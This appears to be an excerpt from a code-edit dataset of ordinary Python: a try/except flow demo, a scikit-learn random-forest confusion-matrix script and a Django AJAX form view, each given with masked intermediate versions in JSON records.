# Demonstrates try/except/else/finally flow: a deliberately undefined
# name (`d`) triggers NameError after the length guard passes.
l={1,2,3,4}
try:
	print(l)
	s=len(l)
	# Guard: reject collections longer than 5 elements.
	if s>5:
		raise TypeError
	# `d` is never defined in this script, so this line raises NameError.
	print(d[2])
except TypeError:
	print("Error!!!length should be less than or equals to 5")
except NameError:
	# NOTE(review): message is misleading — this branch handles an
	# undefined name (NameError), not an out-of-range index.
	print("index out of range")
else:
	# Runs only when the try block completes without an exception.
	for i in l:
		print(i)
finally:
	# Always runs, whether or not an exception occurred.
	print("execution done!!!!!!")
|
flexible
|
{
"blob_id": "e59e60b0a4b7deca9c510bd6b9c58636c6d34c80",
"index": 1027,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ntry:\n print(l)\n s = len(l)\n if s > 5:\n raise TypeError\n print(d[2])\nexcept TypeError:\n print('Error!!!length should be less than or equals to 5')\nexcept NameError:\n print('index out of range')\nelse:\n for i in l:\n print(i)\nfinally:\n print('execution done!!!!!!')\n",
"step-3": "l = {1, 2, 3, 4}\ntry:\n print(l)\n s = len(l)\n if s > 5:\n raise TypeError\n print(d[2])\nexcept TypeError:\n print('Error!!!length should be less than or equals to 5')\nexcept NameError:\n print('index out of range')\nelse:\n for i in l:\n print(i)\nfinally:\n print('execution done!!!!!!')\n",
"step-4": "\nl={1,2,3,4}\ntry:\n\tprint(l)\n\ts=len(l)\n\tif s>5:\n\t\traise TypeError\n\tprint(d[2])\n\nexcept TypeError:\n\tprint(\"Error!!!length should be less than or equals to 5\")\nexcept NameError:\n\tprint(\"index out of range\")\nelse:\n\tfor i in l:\n\t\tprint(i)\nfinally:\n\tprint(\"execution done!!!!!!\")",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def main():
data_set = pandas.read_csv('dataset.csv', index_col=False, encoding='gbk')
print('数据集的shape:', data_set.shape)
dnumpy_x, dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)
folds = TrainTestProcesser.split_dnumpy_train_test(dnumpy_x, dnumpy_y)
model = RandomForestClassifier(n_estimators=23)
TrainTestProcesser.apply_SKfold(model, folds)
TrainTestProcesser.train_model(model, dnumpy_x, dnumpy_y)
joblib.dump(model, 'RFC_model.plk')
def getconfusion_matrix():
mp.rcParams['font.family'] = ['sans-serif']
mp.rcParams['font.sans-serif'] = ['SimHei']
classes = get_subdir('音频文件')
data_set = pandas.read_csv('dataset.csv', index_col=False, encoding='gbk')
dnumpy_x, dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)
train_x, test_x, train_y, test_y = ms.train_test_split(dnumpy_x,
dnumpy_y, test_size=0.25, random_state=7)
model = joblib.load('RFC_model.plk')
pred_test_y = model.predict(test_x)
cm = confusion_matrix(test_y, pred_test_y)
r = classification_report(test_y, pred_test_y)
print('分类报告为:', r, sep='\n')
mp.figure()
plot_confusion_matrix(cm, classes=classes, normalize=True, title=
'随机森林分类器混淆矩阵')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main():
data_set = pandas.read_csv('dataset.csv', index_col=False, encoding='gbk')
print('数据集的shape:', data_set.shape)
dnumpy_x, dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)
folds = TrainTestProcesser.split_dnumpy_train_test(dnumpy_x, dnumpy_y)
model = RandomForestClassifier(n_estimators=23)
TrainTestProcesser.apply_SKfold(model, folds)
TrainTestProcesser.train_model(model, dnumpy_x, dnumpy_y)
joblib.dump(model, 'RFC_model.plk')
def getconfusion_matrix():
mp.rcParams['font.family'] = ['sans-serif']
mp.rcParams['font.sans-serif'] = ['SimHei']
classes = get_subdir('音频文件')
data_set = pandas.read_csv('dataset.csv', index_col=False, encoding='gbk')
dnumpy_x, dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)
train_x, test_x, train_y, test_y = ms.train_test_split(dnumpy_x,
dnumpy_y, test_size=0.25, random_state=7)
model = joblib.load('RFC_model.plk')
pred_test_y = model.predict(test_x)
cm = confusion_matrix(test_y, pred_test_y)
r = classification_report(test_y, pred_test_y)
print('分类报告为:', r, sep='\n')
mp.figure()
plot_confusion_matrix(cm, classes=classes, normalize=True, title=
'随机森林分类器混淆矩阵')
def plot_confusion_matrix(cm, classes, normalize=False, title=
'Confusion matrix', cmap=mp.cm.Blues):
if normalize:
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
print('混淆矩阵归一化')
else:
print('混淆矩阵未归一化')
print('混淆矩阵为:', cm)
mp.imshow(cm, interpolation='nearest', cmap=cmap)
mp.title(title)
mp.colorbar()
tick_marks = np.arange(len(classes))
mp.xticks(tick_marks, classes, rotation=45)
mp.yticks(tick_marks, classes)
fmt = '.2f' if normalize else 'd'
thresh = cm.max() / 2.0
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
mp.text(j, i, format(cm[i, j], fmt), horizontalalignment='center',
color='white' if cm[i, j] > thresh else 'black')
mp.tight_layout()
mp.ylabel('True label')
mp.xlabel('Predicted label')
mp.savefig('confusion_matrix_RFC.png', format='png')
mp.show()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main():
data_set = pandas.read_csv('dataset.csv', index_col=False, encoding='gbk')
print('数据集的shape:', data_set.shape)
dnumpy_x, dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)
folds = TrainTestProcesser.split_dnumpy_train_test(dnumpy_x, dnumpy_y)
model = RandomForestClassifier(n_estimators=23)
TrainTestProcesser.apply_SKfold(model, folds)
TrainTestProcesser.train_model(model, dnumpy_x, dnumpy_y)
joblib.dump(model, 'RFC_model.plk')
def getconfusion_matrix():
mp.rcParams['font.family'] = ['sans-serif']
mp.rcParams['font.sans-serif'] = ['SimHei']
classes = get_subdir('音频文件')
data_set = pandas.read_csv('dataset.csv', index_col=False, encoding='gbk')
dnumpy_x, dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)
train_x, test_x, train_y, test_y = ms.train_test_split(dnumpy_x,
dnumpy_y, test_size=0.25, random_state=7)
model = joblib.load('RFC_model.plk')
pred_test_y = model.predict(test_x)
cm = confusion_matrix(test_y, pred_test_y)
r = classification_report(test_y, pred_test_y)
print('分类报告为:', r, sep='\n')
mp.figure()
plot_confusion_matrix(cm, classes=classes, normalize=True, title=
'随机森林分类器混淆矩阵')
def plot_confusion_matrix(cm, classes, normalize=False, title=
'Confusion matrix', cmap=mp.cm.Blues):
if normalize:
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
print('混淆矩阵归一化')
else:
print('混淆矩阵未归一化')
print('混淆矩阵为:', cm)
mp.imshow(cm, interpolation='nearest', cmap=cmap)
mp.title(title)
mp.colorbar()
tick_marks = np.arange(len(classes))
mp.xticks(tick_marks, classes, rotation=45)
mp.yticks(tick_marks, classes)
fmt = '.2f' if normalize else 'd'
thresh = cm.max() / 2.0
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
mp.text(j, i, format(cm[i, j], fmt), horizontalalignment='center',
color='white' if cm[i, j] > thresh else 'black')
mp.tight_layout()
mp.ylabel('True label')
mp.xlabel('Predicted label')
mp.savefig('confusion_matrix_RFC.png', format='png')
mp.show()
if __name__ == '__main__':
main()
getconfusion_matrix()
<|reserved_special_token_1|>
import pandas
from sklearn.externals import joblib
import TrainTestProcesser
from sklearn.ensemble import RandomForestClassifier
from Select_OF_File import get_subdir
import matplotlib.pyplot as mp
import sklearn.model_selection as ms
from sklearn.metrics import confusion_matrix
from sklearn.metrics import classification_report
import numpy as np
import itertools
def main():
data_set = pandas.read_csv('dataset.csv', index_col=False, encoding='gbk')
print('数据集的shape:', data_set.shape)
dnumpy_x, dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)
folds = TrainTestProcesser.split_dnumpy_train_test(dnumpy_x, dnumpy_y)
model = RandomForestClassifier(n_estimators=23)
TrainTestProcesser.apply_SKfold(model, folds)
TrainTestProcesser.train_model(model, dnumpy_x, dnumpy_y)
joblib.dump(model, 'RFC_model.plk')
def getconfusion_matrix():
mp.rcParams['font.family'] = ['sans-serif']
mp.rcParams['font.sans-serif'] = ['SimHei']
classes = get_subdir('音频文件')
data_set = pandas.read_csv('dataset.csv', index_col=False, encoding='gbk')
dnumpy_x, dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)
train_x, test_x, train_y, test_y = ms.train_test_split(dnumpy_x,
dnumpy_y, test_size=0.25, random_state=7)
model = joblib.load('RFC_model.plk')
pred_test_y = model.predict(test_x)
cm = confusion_matrix(test_y, pred_test_y)
r = classification_report(test_y, pred_test_y)
print('分类报告为:', r, sep='\n')
mp.figure()
plot_confusion_matrix(cm, classes=classes, normalize=True, title=
'随机森林分类器混淆矩阵')
def plot_confusion_matrix(cm, classes, normalize=False, title=
'Confusion matrix', cmap=mp.cm.Blues):
if normalize:
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
print('混淆矩阵归一化')
else:
print('混淆矩阵未归一化')
print('混淆矩阵为:', cm)
mp.imshow(cm, interpolation='nearest', cmap=cmap)
mp.title(title)
mp.colorbar()
tick_marks = np.arange(len(classes))
mp.xticks(tick_marks, classes, rotation=45)
mp.yticks(tick_marks, classes)
fmt = '.2f' if normalize else 'd'
thresh = cm.max() / 2.0
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
mp.text(j, i, format(cm[i, j], fmt), horizontalalignment='center',
color='white' if cm[i, j] > thresh else 'black')
mp.tight_layout()
mp.ylabel('True label')
mp.xlabel('Predicted label')
mp.savefig('confusion_matrix_RFC.png', format='png')
mp.show()
if __name__ == '__main__':
main()
getconfusion_matrix()
<|reserved_special_token_1|>
import pandas
from sklearn.externals import joblib
import TrainTestProcesser
from sklearn.ensemble import RandomForestClassifier
from Select_OF_File import get_subdir
import matplotlib.pyplot as mp
import sklearn.model_selection as ms
from sklearn.metrics import confusion_matrix
from sklearn.metrics import classification_report
import numpy as np
import itertools
def main():
    """Train a random-forest classifier on dataset.csv and persist it."""
    # Load the dataset; do not use the first column as the row index.
    data_set = pandas.read_csv("dataset.csv",index_col=False,encoding='gbk')
    print("数据集的shape:",data_set.shape)
    # Split the dataset into features x and labels y.
    dnumpy_x,dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)
    # Split into train/test folds (StratifiedKFold per the original
    # comment — TODO confirm against TrainTestProcesser).
    folds= TrainTestProcesser.split_dnumpy_train_test(dnumpy_x, dnumpy_y)
    # Build the model.
    model=RandomForestClassifier(n_estimators=23)
    # Cross-validate over the k folds.
    TrainTestProcesser.apply_SKfold(model, folds)
    # Train on the full dataset.
    TrainTestProcesser.train_model(model, dnumpy_x, dnumpy_y)
    # Save the trained model for later use.
    # NOTE(review): ".plk" looks like a typo for ".pkl", but
    # getconfusion_matrix loads the same name, so it is consistent.
    joblib.dump(model,"RFC_model.plk")
def getconfusion_matrix():
    """Evaluate the saved model and plot its confusion matrix."""
    # Use a CJK-capable font so the Chinese figure title renders.
    mp.rcParams['font.family'] = ['sans-serif']
    mp.rcParams['font.sans-serif'] = ['SimHei']
    # Class names are the sub-directories of the audio folder.
    classes=get_subdir("音频文件")
    data_set = pandas.read_csv("dataset.csv",index_col=False,encoding='gbk')
    dnumpy_x, dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)
    train_x, test_x, train_y, test_y = ms.train_test_split(dnumpy_x, dnumpy_y, test_size=0.25, random_state=7)
    # NOTE(review): main() trains the saved model on the *entire* dataset,
    # so this "test" split overlaps the training data — the evaluation here
    # is optimistic. Consider holding out the test split before training.
    model=joblib.load("RFC_model.plk")
    pred_test_y = model.predict(test_x)
    # Confusion matrix of true vs. predicted labels.
    cm=confusion_matrix(test_y, pred_test_y)
    # Classification report (per-class precision/recall/F1).
    r = classification_report(test_y, pred_test_y)
    print('分类报告为:', r, sep='\n')
    mp.figure()
    plot_confusion_matrix(cm, classes=classes, normalize=True,
                          title='随机森林分类器混淆矩阵')
def plot_confusion_matrix(cm, classes,normalize=False,title='Confusion matrix',
                          cmap=mp.cm.Blues):
    """Render *cm* as an annotated heat map and save it to confusion_matrix_RFC.png.

    cm        -- square confusion matrix (true labels on rows).
    classes   -- tick labels, one per class.
    normalize -- if True, convert each row to proportions first.
    title     -- figure title.
    cmap      -- matplotlib colormap for the heat map.
    """
    if normalize:
        # Row-wise normalisation: each row sums to 1.
        cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
        print("混淆矩阵归一化")
    else:
        print('混淆矩阵未归一化')
    print("混淆矩阵为:",cm)
    mp.imshow(cm, interpolation='nearest', cmap=cmap)
    mp.title(title)
    mp.colorbar()
    ticks = np.arange(len(classes))
    mp.xticks(ticks, classes, rotation=45)
    mp.yticks(ticks, classes)
    # Integer cells for raw counts, two decimals for proportions.
    if normalize:
        cell_fmt = '.2f'
    else:
        cell_fmt = 'd'
    cutoff = cm.max() / 2.
    # Annotate every cell; white text on dark cells for contrast.
    for row in range(cm.shape[0]):
        for col in range(cm.shape[1]):
            mp.text(col, row, format(cm[row, col], cell_fmt),
                    horizontalalignment="center",
                    color="white" if cm[row, col] > cutoff else "black")
    mp.tight_layout()
    mp.ylabel('True label')
    mp.xlabel('Predicted label')
    mp.savefig('confusion_matrix_RFC.png', format='png')
    mp.show()
# Script entry point: train/persist the model, then evaluate and plot.
if __name__ == "__main__":
    main()
    getconfusion_matrix()
|
flexible
|
{
"blob_id": "b0bc55ab05d49605e2f42ea036f8405727c468d2",
"index": 3504,
"step-1": "<mask token>\n\n\ndef main():\n data_set = pandas.read_csv('dataset.csv', index_col=False, encoding='gbk')\n print('数据集的shape:', data_set.shape)\n dnumpy_x, dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)\n folds = TrainTestProcesser.split_dnumpy_train_test(dnumpy_x, dnumpy_y)\n model = RandomForestClassifier(n_estimators=23)\n TrainTestProcesser.apply_SKfold(model, folds)\n TrainTestProcesser.train_model(model, dnumpy_x, dnumpy_y)\n joblib.dump(model, 'RFC_model.plk')\n\n\ndef getconfusion_matrix():\n mp.rcParams['font.family'] = ['sans-serif']\n mp.rcParams['font.sans-serif'] = ['SimHei']\n classes = get_subdir('音频文件')\n data_set = pandas.read_csv('dataset.csv', index_col=False, encoding='gbk')\n dnumpy_x, dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)\n train_x, test_x, train_y, test_y = ms.train_test_split(dnumpy_x,\n dnumpy_y, test_size=0.25, random_state=7)\n model = joblib.load('RFC_model.plk')\n pred_test_y = model.predict(test_x)\n cm = confusion_matrix(test_y, pred_test_y)\n r = classification_report(test_y, pred_test_y)\n print('分类报告为:', r, sep='\\n')\n mp.figure()\n plot_confusion_matrix(cm, classes=classes, normalize=True, title=\n '随机森林分类器混淆矩阵')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n data_set = pandas.read_csv('dataset.csv', index_col=False, encoding='gbk')\n print('数据集的shape:', data_set.shape)\n dnumpy_x, dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)\n folds = TrainTestProcesser.split_dnumpy_train_test(dnumpy_x, dnumpy_y)\n model = RandomForestClassifier(n_estimators=23)\n TrainTestProcesser.apply_SKfold(model, folds)\n TrainTestProcesser.train_model(model, dnumpy_x, dnumpy_y)\n joblib.dump(model, 'RFC_model.plk')\n\n\ndef getconfusion_matrix():\n mp.rcParams['font.family'] = ['sans-serif']\n mp.rcParams['font.sans-serif'] = ['SimHei']\n classes = get_subdir('音频文件')\n data_set = pandas.read_csv('dataset.csv', index_col=False, encoding='gbk')\n dnumpy_x, dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)\n train_x, test_x, train_y, test_y = ms.train_test_split(dnumpy_x,\n dnumpy_y, test_size=0.25, random_state=7)\n model = joblib.load('RFC_model.plk')\n pred_test_y = model.predict(test_x)\n cm = confusion_matrix(test_y, pred_test_y)\n r = classification_report(test_y, pred_test_y)\n print('分类报告为:', r, sep='\\n')\n mp.figure()\n plot_confusion_matrix(cm, classes=classes, normalize=True, title=\n '随机森林分类器混淆矩阵')\n\n\ndef plot_confusion_matrix(cm, classes, normalize=False, title=\n 'Confusion matrix', cmap=mp.cm.Blues):\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print('混淆矩阵归一化')\n else:\n print('混淆矩阵未归一化')\n print('混淆矩阵为:', cm)\n mp.imshow(cm, interpolation='nearest', cmap=cmap)\n mp.title(title)\n mp.colorbar()\n tick_marks = np.arange(len(classes))\n mp.xticks(tick_marks, classes, rotation=45)\n mp.yticks(tick_marks, classes)\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.0\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n mp.text(j, i, format(cm[i, j], fmt), horizontalalignment='center',\n color='white' if cm[i, j] > thresh else 'black')\n mp.tight_layout()\n mp.ylabel('True label')\n mp.xlabel('Predicted label')\n 
mp.savefig('confusion_matrix_RFC.png', format='png')\n mp.show()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n data_set = pandas.read_csv('dataset.csv', index_col=False, encoding='gbk')\n print('数据集的shape:', data_set.shape)\n dnumpy_x, dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)\n folds = TrainTestProcesser.split_dnumpy_train_test(dnumpy_x, dnumpy_y)\n model = RandomForestClassifier(n_estimators=23)\n TrainTestProcesser.apply_SKfold(model, folds)\n TrainTestProcesser.train_model(model, dnumpy_x, dnumpy_y)\n joblib.dump(model, 'RFC_model.plk')\n\n\ndef getconfusion_matrix():\n mp.rcParams['font.family'] = ['sans-serif']\n mp.rcParams['font.sans-serif'] = ['SimHei']\n classes = get_subdir('音频文件')\n data_set = pandas.read_csv('dataset.csv', index_col=False, encoding='gbk')\n dnumpy_x, dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)\n train_x, test_x, train_y, test_y = ms.train_test_split(dnumpy_x,\n dnumpy_y, test_size=0.25, random_state=7)\n model = joblib.load('RFC_model.plk')\n pred_test_y = model.predict(test_x)\n cm = confusion_matrix(test_y, pred_test_y)\n r = classification_report(test_y, pred_test_y)\n print('分类报告为:', r, sep='\\n')\n mp.figure()\n plot_confusion_matrix(cm, classes=classes, normalize=True, title=\n '随机森林分类器混淆矩阵')\n\n\ndef plot_confusion_matrix(cm, classes, normalize=False, title=\n 'Confusion matrix', cmap=mp.cm.Blues):\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print('混淆矩阵归一化')\n else:\n print('混淆矩阵未归一化')\n print('混淆矩阵为:', cm)\n mp.imshow(cm, interpolation='nearest', cmap=cmap)\n mp.title(title)\n mp.colorbar()\n tick_marks = np.arange(len(classes))\n mp.xticks(tick_marks, classes, rotation=45)\n mp.yticks(tick_marks, classes)\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.0\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n mp.text(j, i, format(cm[i, j], fmt), horizontalalignment='center',\n color='white' if cm[i, j] > thresh else 'black')\n mp.tight_layout()\n mp.ylabel('True label')\n mp.xlabel('Predicted label')\n 
mp.savefig('confusion_matrix_RFC.png', format='png')\n mp.show()\n\n\nif __name__ == '__main__':\n main()\n getconfusion_matrix()\n",
"step-4": "import pandas\nfrom sklearn.externals import joblib\nimport TrainTestProcesser\nfrom sklearn.ensemble import RandomForestClassifier\nfrom Select_OF_File import get_subdir\nimport matplotlib.pyplot as mp\nimport sklearn.model_selection as ms\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import classification_report\nimport numpy as np\nimport itertools\n\n\ndef main():\n data_set = pandas.read_csv('dataset.csv', index_col=False, encoding='gbk')\n print('数据集的shape:', data_set.shape)\n dnumpy_x, dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)\n folds = TrainTestProcesser.split_dnumpy_train_test(dnumpy_x, dnumpy_y)\n model = RandomForestClassifier(n_estimators=23)\n TrainTestProcesser.apply_SKfold(model, folds)\n TrainTestProcesser.train_model(model, dnumpy_x, dnumpy_y)\n joblib.dump(model, 'RFC_model.plk')\n\n\ndef getconfusion_matrix():\n mp.rcParams['font.family'] = ['sans-serif']\n mp.rcParams['font.sans-serif'] = ['SimHei']\n classes = get_subdir('音频文件')\n data_set = pandas.read_csv('dataset.csv', index_col=False, encoding='gbk')\n dnumpy_x, dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)\n train_x, test_x, train_y, test_y = ms.train_test_split(dnumpy_x,\n dnumpy_y, test_size=0.25, random_state=7)\n model = joblib.load('RFC_model.plk')\n pred_test_y = model.predict(test_x)\n cm = confusion_matrix(test_y, pred_test_y)\n r = classification_report(test_y, pred_test_y)\n print('分类报告为:', r, sep='\\n')\n mp.figure()\n plot_confusion_matrix(cm, classes=classes, normalize=True, title=\n '随机森林分类器混淆矩阵')\n\n\ndef plot_confusion_matrix(cm, classes, normalize=False, title=\n 'Confusion matrix', cmap=mp.cm.Blues):\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print('混淆矩阵归一化')\n else:\n print('混淆矩阵未归一化')\n print('混淆矩阵为:', cm)\n mp.imshow(cm, interpolation='nearest', cmap=cmap)\n mp.title(title)\n mp.colorbar()\n tick_marks = np.arange(len(classes))\n mp.xticks(tick_marks, classes, rotation=45)\n 
mp.yticks(tick_marks, classes)\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.0\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n mp.text(j, i, format(cm[i, j], fmt), horizontalalignment='center',\n color='white' if cm[i, j] > thresh else 'black')\n mp.tight_layout()\n mp.ylabel('True label')\n mp.xlabel('Predicted label')\n mp.savefig('confusion_matrix_RFC.png', format='png')\n mp.show()\n\n\nif __name__ == '__main__':\n main()\n getconfusion_matrix()\n",
"step-5": "import pandas\nfrom sklearn.externals import joblib\nimport TrainTestProcesser\nfrom sklearn.ensemble import RandomForestClassifier\nfrom Select_OF_File import get_subdir\nimport matplotlib.pyplot as mp\nimport sklearn.model_selection as ms\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import classification_report\nimport numpy as np\nimport itertools\ndef main():\n #获取数据集\n #不使用第一列作为行索引\n data_set = pandas.read_csv(\"dataset.csv\",index_col=False,encoding='gbk')\n print(\"数据集的shape:\",data_set.shape)\n #将数据集分为特征x和标签y\n dnumpy_x,dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)\n #使用StratifiedKFold将数据集分为训练集和测试集\n folds= TrainTestProcesser.split_dnumpy_train_test(dnumpy_x, dnumpy_y)\n #创建模型\n model=RandomForestClassifier(n_estimators=23)\n #使用kfol交叉验证\n TrainTestProcesser.apply_SKfold(model, folds)\n #训练模型\n TrainTestProcesser.train_model(model, dnumpy_x, dnumpy_y)\n #保存模型以备将来使用\n joblib.dump(model,\"RFC_model.plk\")\n\n\n\ndef getconfusion_matrix():\n mp.rcParams['font.family'] = ['sans-serif']\n mp.rcParams['font.sans-serif'] = ['SimHei']\n classes=get_subdir(\"音频文件\")\n data_set = pandas.read_csv(\"dataset.csv\",index_col=False,encoding='gbk')\n dnumpy_x, dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)\n train_x, test_x, train_y, test_y = ms.train_test_split(dnumpy_x, dnumpy_y, test_size=0.25, random_state=7)\n model=joblib.load(\"RFC_model.plk\")\n pred_test_y = model.predict(test_x)\n #混淆矩阵\n cm=confusion_matrix(test_y, pred_test_y)\n # 获取分类报告\n r = classification_report(test_y, pred_test_y)\n print('分类报告为:', r, sep='\\n')\n\n mp.figure()\n plot_confusion_matrix(cm, classes=classes, normalize=True,\n title='随机森林分类器混淆矩阵')\n\ndef plot_confusion_matrix(cm, classes,normalize=False,title='Confusion matrix',\n cmap=mp.cm.Blues):\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"混淆矩阵归一化\")\n else:\n print('混淆矩阵未归一化')\n\n print(\"混淆矩阵为:\",cm)\n\n mp.imshow(cm, interpolation='nearest', 
cmap=cmap)\n mp.title(title)\n mp.colorbar()\n tick_marks = np.arange(len(classes))\n mp.xticks(tick_marks, classes, rotation=45)\n mp.yticks(tick_marks, classes)\n\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n mp.text(j, i, format(cm[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n mp.tight_layout()\n mp.ylabel('True label')\n mp.xlabel('Predicted label')\n mp.savefig('confusion_matrix_RFC.png', format='png')\n mp.show()\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n main()\n getconfusion_matrix()",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
from django.contrib.auth.mixins import LoginRequiredMixin
from django.http import JsonResponse
from django.views.generic import CreateView, UpdateView, ListView, \
DeleteView, TemplateView
from example.forms import EditorTextForm
from example.models import EdidorText
class AjaxableResponseMixin:
    """
    Mixin to add AJAX support to a form.

    Must be used with an object-based FormView (e.g. CreateView).

    A request is treated as AJAX when it carries the
    ``X-Requested-With: XMLHttpRequest`` header — the same check the
    removed ``HttpRequest.is_ajax()`` performed, so this works on
    Django 4.0+ as well as older releases.
    """

    def _is_ajax(self):
        # HttpRequest.is_ajax() was deprecated in Django 3.1 and removed
        # in 4.0; this reproduces its exact header test.
        return self.request.headers.get('x-requested-with') == 'XMLHttpRequest'

    def form_invalid(self, form):
        """Return field errors as JSON (HTTP 400) for AJAX requests."""
        response = super().form_invalid(form)
        if self._is_ajax():
            return JsonResponse(form.errors, status=400)
        return response

    def form_valid(self, form):
        """Return the saved object's pk as JSON for AJAX requests."""
        # Call the parent's form_valid() first because it may do real work
        # (CreateView saves the form and sets self.object here).
        response = super().form_valid(form)
        if self._is_ajax():
            return JsonResponse({'pk': self.object.pk})
        return response
class EditorHomeView(LoginRequiredMixin, AjaxableResponseMixin, CreateView):
    """Create/edit view for editor texts, with AJAX responses.

    BUG FIX: the module imports ``EdidorText`` (sic) from example.models,
    but this class referenced the undefined name ``EditorText`` for its
    ``model`` attribute and in get_context_data(), which raised NameError
    as soon as the module was imported.  All references now use the
    imported name.  (The model's spelling itself looks like a typo and is
    worth fixing at the model level separately.)
    """
    form_class = EditorTextForm
    model = EdidorText

    def get_context_data(self, **kwargs):
        """Add the current user's five most recent texts to the context."""
        context = super().get_context_data(**kwargs)
        context['recent_texts'] = EdidorText.objects.filter(
            created_by=self.request.user
        )[:5]
        return context

    def get_object(self):
        """Return the instance named by POST['pk'], or None to create one."""
        pk = self.request.POST.get('pk')
        if not pk:
            return None
        return EdidorText.objects.get(pk=int(pk))

    def form_valid(self, form):
        """Stamp the current user on the instance before saving."""
        form.instance.created_by = self.request.user
        return super().form_valid(form)

    def get_form_kwargs(self):
        """Return the keyword arguments for instantiating the form."""
        # Resolve the target object first so the form binds to an existing
        # instance when a pk was posted (edit-in-place via CreateView).
        self.object = self.get_object()
        kwargs = super().get_form_kwargs()
        return kwargs
|
normal
|
{
"blob_id": "87a4fcb26464925952dde57fecf4709f01e9fed7",
"index": 9916,
"step-1": "<mask token>\n\n\nclass AjaxableResponseMixin:\n <mask token>\n <mask token>\n <mask token>\n\n\nclass EditorHomeView(LoginRequiredMixin, AjaxableResponseMixin, CreateView):\n form_class = EditorTextForm\n model = EditorText\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['recent_texts'] = EditorText.objects.filter(created_by=self\n .request.user)[:5]\n return context\n\n def get_object(self):\n pk = self.request.POST.get('pk')\n if not pk:\n return None\n return EdidorText.objects.get(pk=int(pk))\n\n def form_valid(self, form):\n form.instance.created_by = self.request.user\n return super().form_valid(form)\n\n def get_form_kwargs(self):\n \"\"\"Return the keyword arguments for instantiating the form.\"\"\"\n self.object = self.get_object()\n kwargs = super().get_form_kwargs()\n return kwargs\n",
"step-2": "<mask token>\n\n\nclass AjaxableResponseMixin:\n <mask token>\n\n def form_invalid(self, form):\n response = super().form_invalid(form)\n if self.request.is_ajax():\n return JsonResponse(form.errors, status=400)\n else:\n return response\n <mask token>\n\n\nclass EditorHomeView(LoginRequiredMixin, AjaxableResponseMixin, CreateView):\n form_class = EditorTextForm\n model = EditorText\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['recent_texts'] = EditorText.objects.filter(created_by=self\n .request.user)[:5]\n return context\n\n def get_object(self):\n pk = self.request.POST.get('pk')\n if not pk:\n return None\n return EdidorText.objects.get(pk=int(pk))\n\n def form_valid(self, form):\n form.instance.created_by = self.request.user\n return super().form_valid(form)\n\n def get_form_kwargs(self):\n \"\"\"Return the keyword arguments for instantiating the form.\"\"\"\n self.object = self.get_object()\n kwargs = super().get_form_kwargs()\n return kwargs\n",
